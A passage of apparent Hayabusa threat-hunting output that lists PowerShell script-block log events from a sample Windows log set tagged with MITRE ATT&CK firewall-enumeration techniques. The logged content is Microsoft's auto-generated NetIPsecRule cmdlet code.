($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 
'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] 
${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] 
${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryp",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"toSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
